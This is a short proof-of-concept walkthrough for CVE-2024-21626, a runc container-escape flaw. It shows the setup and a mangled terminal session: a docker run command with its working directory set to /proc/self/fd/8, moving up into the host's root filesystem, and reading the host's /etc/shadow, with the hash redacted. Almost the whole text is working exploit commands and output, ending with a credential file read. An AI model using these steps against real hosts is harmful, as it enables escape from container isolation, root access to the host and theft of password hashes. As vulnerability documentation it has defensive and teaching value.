Make sure the user is in the docker group, and RunC running a vulnerable version.
Start a new container and set the working directory to /proc/self/fd/<fd> (where <fd> stands for the file descriptor when opening /sys/fs/cgroup in host filesystem. Usually it’s 7 or 8).
cve-2024-21626➜iduid=1000(user) ...snip...,998(docker)cve-2024-21626➜runc--versionruncversion1.1.5+ds1commit:1.1.5+ds1-1+b4spec:1.1.0go:go1.21.3libseccomp:2.5.4cve-2024-21626➜iddockerrun-w/proc/self/fd/8--namecve-2024-21626--rm-itdebian:bookworm...snip...root@7185badc969c:.#pwdpwd: errorretrievingcurrentdirectory:getcwd:cannotaccessparentdirectories:Nosuchfileordirectoryroot@7185badc969c:.#ls-aljob-working-directory: error retrieving current directory: getcwd: cannot access parent directories: No such file or directory
root@7185badc969c:.#cd../../root@7185badc969c:../..#ls-altotal88drwxr-xr-x19rootroot4096Oct3111:20.drwxr-xr-x19rootroot4096Oct3111:20..drwx------2rootroot4096Oct3110:17.cachelrwxrwxrwx1rootroot7Oct3109:44bin ->usr/bindrwxr-xr-x3rootroot4096Oct3111:24bootdrwxr-xr-x17rootroot3420Feb807:46devdrwxr-xr-x199rootroot12288Jan2611:22etcdrwxr-xr-x3rootroot4096Oct3110:58homelrwxrwxrwx1rootroot33Oct3111:20initrd.img ->boot/initrd.img-6.5.0-kali3-amd64lrwxrwxrwx1rootroot33Oct3109:46initrd.img.old ->boot/initrd.img-6.3.0-kali1-amd64lrwxrwxrwx1rootroot7Oct3109:44lib ->usr/liblrwxrwxrwx1rootroot9Oct3109:44lib32 ->usr/lib32lrwxrwxrwx1rootroot9Oct3109:44lib64 ->usr/lib64drwx------2rootroot16384Oct3109:44lost+founddrwxr-xr-x3rootroot4096Oct3109:44mediadrwxr-xr-x3rootroot4096Nov813:45mntdrwxr-xr-x3rootroot4096Oct3110:11optdr-xr-xr-x227rootroot0Feb807:46procdrwx------7rootroot4096Feb711:07rootdrwxr-xr-x37rootroot980Feb807:46runlrwxrwxrwx1rootroot8Oct3109:44sbin ->usr/sbindrwxr-xr-x3rootroot4096Oct3110:17srvdr-xr-xr-x13rootroot0Feb807:46sysdrwxrwxrwt14rootroot12288Feb810:55tmpdrwxr-xr-x15rootroot4096Oct3111:14usrdrwxr-xr-x12rootroot4096Oct3111:31varlrwxrwxrwx1rootroot30Oct3111:20vmlinuz ->boot/vmlinuz-6.5.0-kali3-amd64lrwxrwxrwx1rootroot30Oct3109:46vmlinuz.old ->boot/vmlinuz-6.3.0-kali1-amd64root@7185badc969c:../../..#catetc/shadowuser:$y$ZZZ$XXXX:19661:0:99999:7:::